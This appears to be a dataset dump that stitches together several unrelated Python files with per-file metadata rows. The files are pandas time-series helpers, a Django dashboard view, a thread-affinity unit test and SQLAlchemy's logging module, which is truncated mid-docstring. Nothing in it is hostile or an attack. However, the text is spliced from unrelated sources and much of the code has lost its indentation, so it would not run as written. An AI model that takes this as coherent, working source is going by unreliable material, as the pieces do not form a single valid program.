'fnna' (drop leading all-nan rows), 'nona' (drop all-nan rows), or any
pandas interpolate method; a negative numeric limit interpolates backward.
"""
methods = as_list(method)
if len(methods) == 0:
return df
# numpy arrays round-trip through pandas and come back as .values
if is_arr(df):
return df_fillna(pd.DataFrame(df) if len(df.shape)==2 else pd.Series(df), method, axis, limit).values
res = df
for m in methods:
if is_num(m):
res = res.fillna(value = m, axis = axis, limit = limit)
elif m in ['backfill', 'bfill', 'pad', 'ffill']:
res = res.fillna(method = m, axis = axis, limit = limit)
elif m in ('fnna', 'nona'):
nonan = ~np.isnan(res)
# for 2-d frames a row survives if ANY column is non-nan
if len(res.shape)==2:
nonan = nonan.max(axis=1)
if m == 'fnna':
# keep everything from the first non-nan row onwards; empty result if all-nan
nonan = nonan[nonan.values]
if len(nonan):
res = res[nonan.index[0]:]
else:
res = res.iloc[:0]
elif m == 'nona':
res = res[nonan.values]
else:
# any other string is passed to pandas interpolate; negative limit means backward
if is_num(limit) and limit<0:
res = res.interpolate(method = m, axis = axis, limit = abs(limit),
limit_direction = 'backward')
else:
res = res.interpolate(method = m, axis = axis, limit = limit)
return res
def df_fillna(df, method = None, axis = 0, limit = None):
# Public wrapper over the @loop-decorated _df_fillna (maps over lists/tuples/dicts of dataframes).
return _df_fillna(df, method = method, axis = axis, limit = limit)
@loop(dict, list, tuple)
def _nona(df, value = np.nan):
"""Drop rows of df equal to `value`; nan and inf are matched via isnan/isinf rather than ==."""
if np.isnan(value):
mask = np.isnan(df)
elif np.isinf(value):
mask = np.isinf(df)
else:
mask = df == value
# for 2-d frames, drop a row only when EVERY column is masked
if len(mask.shape) == 2:
mask = mask.min(axis=1) == 1
return df[~mask]
def nona(a, value = np.nan):
    """Drop rows of `a` that are entirely equal to `value` (nan/inf handled via isnan/isinf).

    Bug fix: `value` was previously accepted but never forwarded to _nona
    (`return _nona(a)`), so e.g. nona(a, 0) silently filtered nans instead of
    zeros. Default behaviour (value = np.nan) is unchanged.
    """
    return _nona(a, value)
@loop(list, tuple, dict)
def _df_reindex(ts, index, method = None, limit = None):
"""Reindex a pandas object onto `index`, or resize a numpy array to an integer length.

Fill methods in `method` are applied after reindexing (see _df_fillna).
"""
methods = as_list(method)
if is_pd(ts):
if is_int(index):
raise ValueError('trying to reindex dataframe %s using numpy interval length %i'%(ts, index))
# ffill/bfill-style methods reindex off the nan-stripped series first, then apply remaining fills
if len(methods) and methods[0] in ['backfill', 'bfill', 'pad', 'ffill']:
res = _nona(ts).reindex(index, method = methods[0], limit = limit)
res = _df_fillna(res, method = methods[1:], limit = limit)
else:
res = ts.reindex(index)
res = _df_fillna(res, method = method, limit = limit)
return res
elif is_arr(ts):
if isinstance(index, pd.Index):
if len(index) == len(ts):
return ts
else:
raise ValueError('trying to reindex numpy array %s using pandas index %s'%(ts, index))
elif is_int(index):
# integer index: trim the head, or pad the head with nans, to the requested length
if index<len(ts):
res = ts[-index:]
elif index>len(ts):
shape = (index - len(ts),) + ts.shape[1:]
res = np.concatenate([np.full(shape, np.nan),ts])
else:
res = ts
return df_fillna(res, method = methods, limit = limit)
else:
return ts
else:
return ts
@loop(list, tuple, dict)
def _df_recolumn(ts, columns):
"""Rebuild a multi-column dataframe on the given `columns`, filling absent columns with nan."""
if columns is not None and is_df(ts) and ts.shape[1] > 1 and len(set(ts.columns)) == ts.shape[1]:
return pd.DataFrame({col: ts[col].values if col in ts.columns else np.nan for col in columns}, index = ts.index)
else:
return ts
def df_recolumn(ts, columns = None):
# Public wrapper over the @loop-decorated _df_recolumn (maps over lists/tuples/dicts).
return _df_recolumn(ts, columns)
def np_reindex(ts, index, columns = None):
    """Pandas-ify a numpy array onto (the tail of) the given index, optionally setting columns."""
    if is_pd(index):
        index = index.index
    # align lengths by trimming whichever side is longer, keeping the most recent rows
    if len(index) > len(ts):
        index = index[-len(ts):]
    elif len(index) < len(ts):
        ts = ts[-len(index):]
    res = pd.Series(ts, index) if len(ts.shape) < 2 else pd.DataFrame(ts, index)
    if columns is not None:
        res.columns = columns.columns if is_df(columns) else columns
    return res
def df_reindex(ts, index = None, method = None, limit = None):
    """Reindex ts (or a collection of ts) onto `index`.

    `index` may be a join-rule string ('inner'/'outer'/'left'/'right'),
    a timeseries (its index is used), or an array (wrapped in pd.Index).
    """
    if index is None:
        return ts
    if is_str(index):
        index = df_index(ts, index)
    elif is_ts(index):
        index = index.index
    elif is_arr(index):
        index = pd.Index(index)
    return _df_reindex(ts, index = index, method = method, limit = limit)
def df_concat(objs, columns = None, axis=1, join = 'outer'):
"""Concatenate a list/dict of objects column-wise; dict keys become column names.

Non-pandas members are broadcast as constant Series on the concatenated index.
"""
if isinstance(objs, dict):
columns = list(objs.keys())
objs = list(objs.values())
if isinstance(objs, list):
df_objs = [o for o in objs if is_pd(o)]
res = pd.concat(df_objs, axis = axis, join = join)
# second pass: broadcast any scalar members onto the index discovered in the first pass
if len(df_objs) < len(objs):
df_objs = [o if is_pd(o) else pd.Series(o, res.index) for o in objs]
res = pd.concat(df_objs, axis = axis, join = join)
elif isinstance(objs, pd.DataFrame):
res = objs.copy() if columns is not None else objs
if columns is not None:
if isinstance(columns, list):
res.columns = columns
else:
# non-list columns is treated as a rename mapping
res = res.rename(columns = columns)
return res
@loop(list, dict, tuple)
def _df_column(ts, column, i = None, n = None):
"""Pull a single column out of ts by name (`column`) or by position (`i`).

`n`, when given, asserts the expected width; non-2-d inputs pass through.
"""
if is_df(ts):
if ts.shape[1] == 1:
return ts[ts.columns[0]]
elif column in ts.columns:
return ts[column]
elif column is None and i is not None:
# positional access is only legal on dataframes WITHOUT proper (unique) headers
if len(set(ts.columns)) == ts.shape[1]:
raise ValueError('trying to grab %ith column from a dataframe with proper columns: %s'%(i, ts.columns))
elif n is not None and ts.shape[1]!=n:
raise ValueError('trying to grab %ith column and asserting must have %i columns but have %i'%(i, n, ts.shape[1]))
else:
if i<ts.shape[1]:
return ts.iloc[:,i]
else:
return np.nan
else:
return np.nan
elif is_arr(ts) and len(ts.shape) == 2:
if ts.shape[1] == 1:
return ts.T[0]
elif i is not None:
if n is not None and ts.shape[1]!=n:
raise ValueError('trying to grab %ith column and asserting must have %i columns but have %i'%(i, n, ts.shape[1]))
elif i<ts.shape[1]:
return ts.T[i]
else:
return np.nan
else:
return ts
else:
return ts
def df_column(ts, column, i = None, n = None):
# Public wrapper over the @loop-decorated _df_column (maps over lists/dicts/tuples).
return _df_column(ts = ts, column = column, i = i, n = n)
def _convert(res, columns):
    """Reassemble per-column results into a DataFrame/array/Series; tuples are converted elementwise."""
    values = list(res.values())
    if is_tss(values):
        return pd.DataFrame(res)
    if is_arrs(values) and is_int(columns):
        return np.array(values).T
    if is_tuples(values):
        rows = zipper(*values)
        return tuple([_convert(dict(zip(res.keys(), row)), columns) for row in rows])
    return np.array(values) if is_int(columns) else pd.Series(res)
def df_sync(dfs, join = 'ij', method = None, columns = 'ij'):
    """Synchronize a list/tuple/dict of dataframes onto a joint index and, optionally, joint columns."""
    if isinstance(dfs, dict):
        members = list(dfs.values())
    elif isinstance(dfs, (list, tuple)):
        members = list(dfs)
    else:
        return dfs
    flat = _list(members)
    tss = [t for t in flat if is_ts(t)]
    joint = df_index(flat, join)
    dfs = df_reindex(dfs, joint, method = method)
    # column synchronization is optional
    if columns is False or columns is None:
        return dfs
    cols = df_columns(tss, columns)
    return df_recolumn(dfs, cols)
class presync(wrapper):
"""Decorator that pre-synchronizes timeseries arguments (joint index, fill method,
joint columns) before calling the wrapped function; see the documented copy of this
class elsewhere in the file for usage examples."""
def __init__(self, function = None, index = 'inner', method = None, columns = 'inner', default = np.nan):
super(presync, self).__init__(function = function, index = index, method = method, columns = columns , default = default)
@property
def ij(self):
# inner-join variant
return copy(self) + dict(index = 'inner')
@property
def oj(self):
# outer-join variant
return self + dict(index = 'outer')
@property
def lj(self):
# left-join variant
return self + dict(index = 'left')
@property
def rj(self):
# right-join variant
return self + dict(index = 'right')
@property
def ffill(self):
# forward-fill variant
return copy(self) + dict(method = 'ffill')
@property
def bfill(self):
# back-fill variant
return self + dict(method = 'bfill')
def wrapped(self, *args, **kwargs):
# per-call overrides trump the stored defaults
_idx = kwargs.pop('join', self.index)
_method = kwargs.pop('method', self.method)
_columns = kwargs.pop('columns', self.columns)
values = list(args) + list(kwargs.values())
listed = _list(values)
tss = [ts for ts in listed if is_ts(ts)]
callargs = inspect.getcallargs(self.function, *args, **kwargs)
# 'join' may name one of the function's own parameters, whose index is then used verbatim
if is_str(_idx) and _idx in callargs:
index = _index(callargs[_idx])
else:
index = df_index(listed, _idx)
args_= df_reindex(args, index, method = _method)
kwargs_= df_reindex(kwargs, index, method = _method)
### now we do the columns
if _columns is False:
return self.function(*args_, **kwargs_)
else:
cols = [tuple(ts.columns) for ts in tss if is_df(ts) and ts.shape[1]>1]
if len(set(cols))==1: # special case where all 2-d dataframes have same column headers
columns = cols[0]
n = len(columns)
res = {column: self.function(*df_column(args_,column = column, i = i, n = n), **df_column(kwargs_, column=column, i = i, n = n)) for i, column in enumerate(columns)}
else:
columns = df_columns(listed, _columns)
# integer columns means headerless width: apply function positionally, column by column
if is_int(columns):
res = {i: self.function(*df_column(args_, column = None, i = i), **df_column(kwargs_, column=None, i = i)) for i in range(columns)}
elif columns is None:
return self.function(*df_column(args_, column = None), **df_column(kwargs_, column = None))
else:
columns = list(columns) if isinstance(columns, pd.Index) else as_list(columns)
columns = sorted(columns)
res = {column: self.function(*df_column(args_,column = column), **df_column(kwargs_, column=column)) for column in columns}
# stitch the per-column dict back into a DataFrame/array/Series/tuple
converted = _convert(res, columns)
return converted
@presync
def _div_(a, b):
    """a divided by b, with presync inner-joining any timeseries arguments."""
    return a / b


@presync
def _sub_(a, b):
    """a minus b, with presync inner-joining any timeseries arguments."""
    return a - b


@presync
def _add_(a, b):
    """a plus b, with presync inner-joining any timeseries arguments."""
    return a + b


@presync
def _mul_(a, b):
    """a times b, with presync inner-joining any timeseries arguments."""
    return a * b


@presync
def _pow_(a, b):
    """a raised to b, with presync inner-joining any timeseries arguments."""
    return a ** b
def add_(a, b = None, join = 'ij', method = None, columns = 'ij'):
    """Sum an arbitrary collection of values/timeseries, pairwise presynched."""
    terms = as_list(a) + as_list(b)
    step = lambda x, y: _add_(x, y, join = join, method = method, columns = columns)
    return reducer(step, terms)


def mul_(a, b = None, join = 'ij', method = None, columns = 'ij'):
    """Multiply an arbitrary collection of values/timeseries, pairwise presynched."""
    terms = as_list(a) + as_list(b)
    step = lambda x, y: _mul_(x, y, join = join, method = method, columns = columns)
    return reducer(step, terms)


def div_(a, b, join = 'ij', method = None, columns = 'ij'):
    """Divide a by b; list arguments are first collapsed via mul_."""
    if isinstance(a, list):
        a = mul_(a, join = join, method = method, columns = columns)
    if isinstance(b, list):
        b = mul_(b, join = join, method = method, columns = columns)
    return _div_(a, b, join = join, method = method, columns = columns)


def sub_(a, b, join = 'ij', method = None, columns = 'ij'):
    """Subtract b from a; list arguments are first collapsed via add_."""
    if isinstance(a, list):
        a = add_(a, join = join, method = method, columns = columns)
    if isinstance(b, list):
        b = add_(b, join = join, method = method, columns = columns)
    return _sub_(a, b, join = join, method = method, columns = columns)


def pow_(a, b, join = 'ij', method = None, columns = 'ij'):
    """a to the power b, presynched."""
    return _pow_(a, b, join = join, method = method, columns = columns)


def min_(a, b = None, join = 'ij', method = None, columns = 'ij'):
    """Reduced np.minimum across all inputs, synched onto a joint index first."""
    terms = df_sync(as_list(a) + as_list(b), join = join, method = method, columns = columns)
    return reducer(np.minimum, terms)


def max_(a, b = None, join = 'ij', method = None, columns = 'ij'):
    """Reduced np.maximum across all inputs, synched onto a joint index first."""
    terms = df_sync(as_list(a) + as_list(b), join = join, method = method, columns = columns)
    return reducer(np.maximum, terms)
def _closed(oc):
if oc in '()oO':
return False
elif oc in '[]cC':
return True
else:
raise ValueError('not sure how to parse boundary %s'%oc)
def _df_slice(df, lb = None, ub = None, openclose = '[)'):
"""One-shot slice of a pandas object/index by bounds; boundary closedness per `openclose`."""
if isinstance(df, (pd.Index, pd.Series, pd.DataFrame)) and len(df)>0 and (ub is not None or lb is not None):
l,u = openclose if openclose else '[)'
l = _closed(l); u = _closed(u)
if is_ts(df):
# normalize bounds to datetimes, leaving time-of-day bounds for the mask path below
lb = lb if lb is None or isinstance(lb, datetime.time) else dt(lb)
ub = ub if ub is None or isinstance(ub, datetime.time) else dt(ub)
# fast path: pandas label slicing when the closedness permits
if (l or lb is None) and (u or ub is None):
try:
return df[lb:ub]
except Exception:
pass
elif (l or lb is None) and (ub is None or not u):
try:
return df[lb:ub]
except Exception:
pass
# slow path: boolean-mask against the index (index.time for time-of-day bounds)
if lb is not None:
index = df if isinstance(df, pd.Index) else df.index
if isinstance(lb, datetime.time):
index = index.time
df = df[index>=lb] if l else df[index>lb]
if ub is not None:
index = df if isinstance(df, pd.Index) else df.index
if isinstance(ub, datetime.time):
index = index.time
df = df[index<=ub] if u else df[index<ub]
return df
def df_slice(df, lb = None, ub = None, openclose = '(]', n = 1):
"""Slice one dataframe (or stitch a list of them sliced at consecutive bounds).

n > 1 keeps a rolling window of n consecutive list members as columns;
datetime.time bounds with lb > ub build a wrap-around intraday window.
"""
if isinstance(lb, tuple) and len(lb) == 2 and ub is None:
lb, ub = lb
# wrap-around intraday window, e.g. 22:00 -> 05:00
if isinstance(ub, datetime.time) and isinstance(lb, datetime.time) and lb>ub:
pre = df_slice(df, None, ub)
post = df_slice(df, lb, None)
return pd.concat([pre, post]).sort_index()
if isinstance(df, list):
if isinstance(lb, list) and ub is None:
ub = lb[1:] + [None]
elif isinstance(ub, list) and lb is None:
lb = [None] + ub[:-1]
boundaries = sorted(set([date for date in lb + ub if date is not None]))
df = [d if is_pd(d) else pd.Series(d, boundaries) for d in df]
if n > 1:
# rolling window: member i carries members i..i+n-1 as columns 0..n-1
df = [pd.concat(df[i: i+n], axis = 1) for i in range(len(df))]
for d in df:
d.columns = range(d.shape[1])
dfs = as_list(df)
dlu = zipper(dfs, lb, ub)
res = [_df_slice(d, lb = l, ub = u, openclose = openclose) for d, l, u in dlu]
if len(res) == 0:
return None
elif len(res) == 1:
return res[0]
elif isinstance(lb, list) and isinstance(ub, list):
# stitched case: concatenate the per-interval slices
res = pd.concat(res)
return res
def df_unslice(df, ub):
"""Invert df_slice: map each upper bound in ub back to its stitched single-column timeseries."""
n = df.shape[1] if is_df(df) else 1
res = dictable(ub = ub, lb = [None] + ub[:-1], i = range(len(ub)))
# cut df back into its (lb, ub] segments
res = res(ts = lambda lb, ub: df_slice(df, lb, ub, '(]'))
# within segment i, column j belongs to upper bound ub[i + j]
res = res(rs = lambda i, ts: dictable(u = ub[i: i+n], j = range(len(ub[i: i+n])))(ts = lambda j: ts[j]))
rs = dictable.concat(res.rs).listby('u').do([pd.concat, nona], 'ts')
return dict(rs['u', 'ts'])
| true
| true
|
f70509cbebb9afd7e84c6f7a0db27094fc3c5d62
| 1,155
|
py
|
Python
|
bis/apps/gepiandashboard/views/reports.py
|
AgustinMachiavello/business-incubation-system
|
983e1308697771570891568f99d1b8ba74441d32
|
[
"MIT"
] | 2
|
2021-03-03T16:16:42.000Z
|
2021-03-08T22:43:10.000Z
|
bis/apps/gepiandashboard/views/reports.py
|
AgustinMachiavello/business-incubation-system
|
983e1308697771570891568f99d1b8ba74441d32
|
[
"MIT"
] | null | null | null |
bis/apps/gepiandashboard/views/reports.py
|
AgustinMachiavello/business-incubation-system
|
983e1308697771570891568f99d1b8ba74441d32
|
[
"MIT"
] | null | null | null |
"""Reports views"""
# Django
from django.views.generic import TemplateView
# Shortcuts
from django.shortcuts import render
from django.shortcuts import redirect, reverse, get_object_or_404
from django.contrib.auth import authenticate
from django.http import (
HttpResponse,
HttpResponseNotFound,
HttpResponseServerError,
HttpResponseRedirect,
)
# Rest framework
from rest_framework.views import APIView
from rest_framework import status
from rest_framework.permissions import (
IsAuthenticated,
IsAdminUser,
)
from rest_framework.authentication import SessionAuthentication, BasicAuthentication
# Menus
from ...incubator.helpers.helperDictionaries import getReportsIndexMenus, getReportIndexAnalytics
class ReportsIndex(TemplateView):
    """Dashboard landing page listing report menus and analytics.

    Renders a 401 page for anonymous users instead of redirecting to login.
    """
    template_name = 'gepiandashboard/pages/reports_index.html'
    # Retained for backward compatibility only; no longer mutated. Mutating a
    # class-level dict via self.context shared state across ALL requests/threads.
    context = {}

    def get(self, request):
        """Handle GET: require an authenticated user, then render the index."""
        if not request.user.is_authenticated:
            return render(request, 'errors/401.html')
        # Build the context fresh per request to avoid cross-request leakage.
        context = {
            'menus': getReportsIndexMenus(),
            'analytics': getReportIndexAnalytics(),
        }
        return render(request, self.template_name, context)
| 29.615385
| 97
| 0.772294
|
from django.views.generic import TemplateView
from django.shortcuts import render
from django.shortcuts import redirect, reverse, get_object_or_404
from django.contrib.auth import authenticate
from django.http import (
HttpResponse,
HttpResponseNotFound,
HttpResponseServerError,
HttpResponseRedirect,
)
from rest_framework.views import APIView
from rest_framework import status
from rest_framework.permissions import (
IsAuthenticated,
IsAdminUser,
)
from rest_framework.authentication import SessionAuthentication, BasicAuthentication
from ...incubator.helpers.helperDictionaries import getReportsIndexMenus, getReportIndexAnalytics
class ReportsIndex(TemplateView):
    """Dashboard landing page listing report menus and analytics.

    Renders a 401 page for anonymous users instead of redirecting to login.
    """
    template_name = 'gepiandashboard/pages/reports_index.html'
    # Retained for backward compatibility only; no longer mutated. Mutating a
    # class-level dict via self.context shared state across ALL requests/threads.
    context = {}

    def get(self, request):
        """Handle GET: require an authenticated user, then render the index."""
        if not request.user.is_authenticated:
            return render(request, 'errors/401.html')
        # Build the context fresh per request to avoid cross-request leakage.
        context = {
            'menus': getReportsIndexMenus(),
            'analytics': getReportIndexAnalytics(),
        }
        return render(request, self.template_name, context)
| true
| true
|
f7050b4939e82b1488b36ea71d1c8a68281e80ae
| 1,683
|
py
|
Python
|
test/TestThreadAffinityLibrary.py
|
srgrr/thread_affinity
|
56c8a50ea3fed276143a3794b8698d25816ca4a9
|
[
"Apache-2.0"
] | 3
|
2018-11-30T11:11:34.000Z
|
2020-08-12T16:48:36.000Z
|
test/TestThreadAffinityLibrary.py
|
srgrr/thread_affinity
|
56c8a50ea3fed276143a3794b8698d25816ca4a9
|
[
"Apache-2.0"
] | 1
|
2019-09-28T23:08:21.000Z
|
2019-09-28T23:08:21.000Z
|
test/TestThreadAffinityLibrary.py
|
bsc-wdc/thread_affinity
|
56c8a50ea3fed276143a3794b8698d25816ca4a9
|
[
"Apache-2.0"
] | null | null | null |
import unittest
import random
import subprocess
import signal
import sys
import os
import thread_affinity
# Test results may vary if executed in different systems
# with different amount of CPUUs
def get_random_mask():
    """Return a random, non-empty, valid affinity mask.

    The mask is a subset of {0, 1, ..., num_procs - 1}, drawn as a random
    bitmask in [1, 2**num_procs - 1] so at least one valid CPU bit is set.
    """
    num_procs = thread_affinity.get_nprocs()
    # random.randint is inclusive on BOTH ends: the previous upper bound of
    # 2 ** num_procs could draw exactly that value, whose only set bit is
    # bit `num_procs` — outside the valid CPU range — yielding an empty mask.
    r = random.randint(1, 2 ** num_procs - 1)
    return [i for i in range(num_procs) if r & (1 << i)]
class TestThreadAffinityLibrary(unittest.TestCase):
"""Test basic Thread Affinity features.
"""
def test_set_get_affinity(self):
"""Test if a simple set & get works
"""
# seeded so the random mask is reproducible across runs
random.seed(1)
proc_list = get_random_mask()
# NOTE(review): this test uses thread_affinity.setaffinity while the subprocess test
# uses thread_affinity.set_affinity — confirm both names exist in the library API.
thread_affinity.setaffinity(proc_list)
self.assertEqual(proc_list, thread_affinity.get_affinity())
def test_set_get_incorrect_affinity(self):
"""Test if the program sets the default affinity in case of illegal masks
"""
illegal_mask = [-1]
default_affinity = thread_affinity.get_default_affinity()
thread_affinity.setaffinity(illegal_mask)
self.assertEqual(default_affinity, thread_affinity.get_affinity())
def test_set_get_affinity_subprocess(self):
"""Test if the affinity of a subprocess can be controlled from above
"""
random.seed(3)
proc_list = get_random_mask()
# redundant: subprocess is already imported at module level
import subprocess
proc = subprocess.Popen(["python", "-c", "while True: pass"])
thread_affinity.set_affinity(proc_list, proc.pid)
self.assertEqual(proc_list, thread_affinity.get_affinity(proc.pid))
# NOTE(review): not in a try/finally — a failing assertion above leaks the busy-loop child
proc.send_signal(signal.SIGKILL)
if __name__ == '__main__':
    # Build and run the suite explicitly with raised verbosity.
    loader = unittest.TestLoader()
    runner = unittest.TextTestRunner(verbosity=2)
    runner.run(loader.loadTestsFromTestCase(TestThreadAffinityLibrary))
| 30.6
| 79
| 0.758764
|
import unittest
import random
import subprocess
import signal
import sys
import os
import thread_affinity
def get_random_mask():
    """Return a random, non-empty, valid affinity mask (subset of range(num_procs))."""
    num_procs = thread_affinity.get_nprocs()
    # randint is inclusive on both ends: the previous bound 2 ** num_procs could
    # select only bit `num_procs` (outside the CPU range), yielding an empty mask.
    r = random.randint(1, 2 ** num_procs - 1)
    return [i for i in range(num_procs) if r & (1 << i)]
class TestThreadAffinityLibrary(unittest.TestCase):
"""Basic thread_affinity set/get tests; results may vary with CPU count."""
def test_set_get_affinity(self):
# seeded so the random mask is reproducible
random.seed(1)
proc_list = get_random_mask()
thread_affinity.setaffinity(proc_list)
self.assertEqual(proc_list, thread_affinity.get_affinity())
def test_set_get_incorrect_affinity(self):
# illegal masks should fall back to the default affinity
illegal_mask = [-1]
default_affinity = thread_affinity.get_default_affinity()
thread_affinity.setaffinity(illegal_mask)
self.assertEqual(default_affinity, thread_affinity.get_affinity())
def test_set_get_affinity_subprocess(self):
random.seed(3)
proc_list = get_random_mask()
# redundant: subprocess is already imported at module level
import subprocess
proc = subprocess.Popen(["python", "-c", "while True: pass"])
# NOTE(review): set_affinity here vs setaffinity above — confirm both API names
thread_affinity.set_affinity(proc_list, proc.pid)
self.assertEqual(proc_list, thread_affinity.get_affinity(proc.pid))
proc.send_signal(signal.SIGKILL)
if __name__ == '__main__':
suite = unittest.TestLoader().loadTestsFromTestCase(TestThreadAffinityLibrary)
unittest.TextTestRunner(verbosity = 2).run(suite)
| true
| true
|
f7050b93fb88c44b9196e0bbbdaf73e49e3cfa6c
| 8,633
|
py
|
Python
|
lib/sqlalchemy/log.py
|
sqlalchemy-bot/sqlalchemy
|
c0736e0b2a3bf8c0952db84f5b9943df9ebf18f7
|
[
"MIT"
] | null | null | null |
lib/sqlalchemy/log.py
|
sqlalchemy-bot/sqlalchemy
|
c0736e0b2a3bf8c0952db84f5b9943df9ebf18f7
|
[
"MIT"
] | null | null | null |
lib/sqlalchemy/log.py
|
sqlalchemy-bot/sqlalchemy
|
c0736e0b2a3bf8c0952db84f5b9943df9ebf18f7
|
[
"MIT"
] | null | null | null |
# sqlalchemy/log.py
# Copyright (C) 2006-2022 the SQLAlchemy authors and contributors
# <see AUTHORS file>
# Includes alterations by Vinay Sajip vinay_sajip@yahoo.co.uk
#
# This module is part of SQLAlchemy and is released under
# the MIT License: https://www.opensource.org/licenses/mit-license.php
"""Logging control and utilities.
Control of logging for SA can be performed from the regular python logging
module. The regular dotted module namespace is used, starting at
'sqlalchemy'. For class-level logging, the class name is appended.
The "echo" keyword parameter, available on SQLA :class:`_engine.Engine`
and :class:`_pool.Pool` objects, corresponds to a logger specific to that
instance only.
"""
from __future__ import annotations
import logging
import sys
from typing import Any
from typing import Optional
from typing import overload
from typing import Set
from typing import Type
from typing import TypeVar
from typing import Union
from .util import py311
from .util import py38
from .util.typing import Literal
if py38:
    STACKLEVEL = True
    # needed as of py3.11.0b1
    # #8019
    STACKLEVEL_OFFSET = 2 if py311 else 1
else:
    # Python < 3.8: logging.Logger methods do not accept ``stacklevel``.
    STACKLEVEL = False
    STACKLEVEL_OFFSET = 0

# Type variable for classes passed through the class_logger() decorator.
_IT = TypeVar("_IT", bound="Identified")

# Allowed values of the per-instance "echo" flag.
_EchoFlagType = Union[None, bool, Literal["debug"]]

# set initial level to WARN. This so that
# log statements don't occur in the absence of explicit
# logging being enabled for 'sqlalchemy'.
rootlogger = logging.getLogger("sqlalchemy")
if rootlogger.level == logging.NOTSET:
    rootlogger.setLevel(logging.WARN)
def _add_default_handler(logger: logging.Logger) -> None:
handler = logging.StreamHandler(sys.stdout)
handler.setFormatter(
logging.Formatter("%(asctime)s %(levelname)s %(name)s %(message)s")
)
logger.addHandler(handler)
_logged_classes: Set[Type["Identified"]] = set()
def _qual_logger_name_for_cls(cls: Type["Identified"]) -> str:
return (
getattr(cls, "_sqla_logger_namespace", None)
or cls.__module__ + "." + cls.__name__
)
def class_logger(cls: Type[_IT]) -> Type[_IT]:
    """Class decorator: attach a module-qualified logger to *cls*.

    Installs ``logger`` plus ``_should_log_debug`` / ``_should_log_info``
    predicates bound to that logger, and registers the class in the
    module-level ``_logged_classes`` set.
    """
    cls_logger = logging.getLogger(_qual_logger_name_for_cls(cls))

    def _debug_enabled(self) -> bool:
        return cls_logger.isEnabledFor(logging.DEBUG)

    def _info_enabled(self) -> bool:
        return cls_logger.isEnabledFor(logging.INFO)

    cls._should_log_debug = _debug_enabled  # type: ignore[assignment]
    cls._should_log_info = _info_enabled  # type: ignore[assignment]
    cls.logger = cls_logger
    _logged_classes.add(cls)
    return cls
_IdentifiedLoggerType = Union[logging.Logger, "InstanceLogger"]
class Identified:
    """Mixin for objects that carry a logger and an "echo" flag.

    Subclasses obtain ``logger`` either from the :func:`class_logger`
    decorator or per-instance via :func:`instance_logger`.
    """

    __slots__ = ()

    # Optional user-assigned name appended to the logger namespace
    # by instance_logger().
    logging_name: Optional[str] = None

    logger: _IdentifiedLoggerType

    # Current echo setting: None / False / True / "debug".
    _echo: _EchoFlagType

    def _should_log_debug(self) -> bool:
        # Replaced per-class by class_logger() with a closure over the
        # class-level logger.
        return self.logger.isEnabledFor(logging.DEBUG)

    def _should_log_info(self) -> bool:
        return self.logger.isEnabledFor(logging.INFO)
class InstanceLogger:
    """A logger adapter (wrapper) for :class:`.Identified` subclasses.

    This allows multiple instances (e.g. Engine or Pool instances)
    to share a logger, but have its verbosity controlled on a
    per-instance basis.

    The basic functionality is to return a logging level
    which is based on an instance's echo setting.

    Default implementation is:

    'debug' -> logging.DEBUG
    True -> logging.INFO
    False -> Effective level of underlying logger (
    logging.WARNING by default)
    None -> same as False
    """

    # Map echo settings to logger levels
    _echo_map = {
        None: logging.NOTSET,
        False: logging.NOTSET,
        True: logging.INFO,
        "debug": logging.DEBUG,
    }

    _echo: _EchoFlagType

    __slots__ = ("echo", "logger")

    def __init__(self, echo: _EchoFlagType, name: str):
        self.echo = echo
        self.logger = logging.getLogger(name)

        # if echo flag is enabled and no handlers,
        # add a handler to the list
        if self._echo_map[echo] <= logging.INFO and not self.logger.handlers:
            _add_default_handler(self.logger)

    #
    # Boilerplate convenience methods
    #
    def debug(self, msg: str, *args: Any, **kwargs: Any) -> None:
        """Delegate a debug call to the underlying logger."""

        self.log(logging.DEBUG, msg, *args, **kwargs)

    def info(self, msg: str, *args: Any, **kwargs: Any) -> None:
        """Delegate an info call to the underlying logger."""

        self.log(logging.INFO, msg, *args, **kwargs)

    def warning(self, msg: str, *args: Any, **kwargs: Any) -> None:
        """Delegate a warning call to the underlying logger."""

        self.log(logging.WARNING, msg, *args, **kwargs)

    warn = warning

    def error(self, msg: str, *args: Any, **kwargs: Any) -> None:
        """
        Delegate an error call to the underlying logger.
        """
        self.log(logging.ERROR, msg, *args, **kwargs)

    def exception(self, msg: str, *args: Any, **kwargs: Any) -> None:
        """Delegate an exception call to the underlying logger."""

        # force traceback capture, matching logging.Logger.exception()
        kwargs["exc_info"] = 1
        self.log(logging.ERROR, msg, *args, **kwargs)

    def critical(self, msg: str, *args: Any, **kwargs: Any) -> None:
        """Delegate a critical call to the underlying logger."""

        self.log(logging.CRITICAL, msg, *args, **kwargs)

    def log(self, level: int, msg: str, *args: Any, **kwargs: Any) -> None:
        """Delegate a log call to the underlying logger.

        The level here is determined by the echo
        flag as well as that of the underlying logger, and
        logger._log() is called directly.

        """

        # inline the logic from isEnabledFor(),
        # getEffectiveLevel(), to avoid overhead.
        if self.logger.manager.disable >= level:
            return

        selected_level = self._echo_map[self.echo]
        if selected_level == logging.NOTSET:
            # echo is off: defer to the underlying logger's configuration
            selected_level = self.logger.getEffectiveLevel()

        if level >= selected_level:
            if STACKLEVEL:
                # shift stacklevel past this adapter so record metadata
                # (module / lineno) points at the real caller
                kwargs["stacklevel"] = (
                    kwargs.get("stacklevel", 1) + STACKLEVEL_OFFSET
                )

            self.logger._log(level, msg, args, **kwargs)

    def isEnabledFor(self, level: int) -> bool:
        """Is this logger enabled for level 'level'?"""

        if self.logger.manager.disable >= level:
            return False
        return level >= self.getEffectiveLevel()

    def getEffectiveLevel(self) -> int:
        """What's the effective level for this logger?"""

        level = self._echo_map[self.echo]
        if level == logging.NOTSET:
            # echo disabled: effective level comes from the wrapped logger
            level = self.logger.getEffectiveLevel()
        return level
def instance_logger(
    instance: Identified, echoflag: _EchoFlagType = None
) -> None:
    """create a logger for an instance that implements :class:`.Identified`."""

    cls_namespace = _qual_logger_name_for_cls(instance.__class__)
    if instance.logging_name:
        name = "%s.%s" % (cls_namespace, instance.logging_name)
    else:
        name = cls_namespace

    instance._echo = echoflag  # type: ignore

    logger: Union[logging.Logger, InstanceLogger]
    if echoflag not in (False, None):
        # an explicit echo flag gets the filtering wrapper, which
        # overrides normal log levels by calling logger._log()
        logger = InstanceLogger(echoflag, name)
    else:
        # no echo setting (or False): hand back a plain Logger and skip
        # the per-call filtering overhead
        logger = logging.getLogger(name)

    instance.logger = logger  # type: ignore
class echo_property:
    # Data descriptor implementing the ``echo`` attribute on Identified
    # objects.  ``__doc__`` is assigned explicitly so the help text lives on
    # the descriptor class itself.
    __doc__ = """\
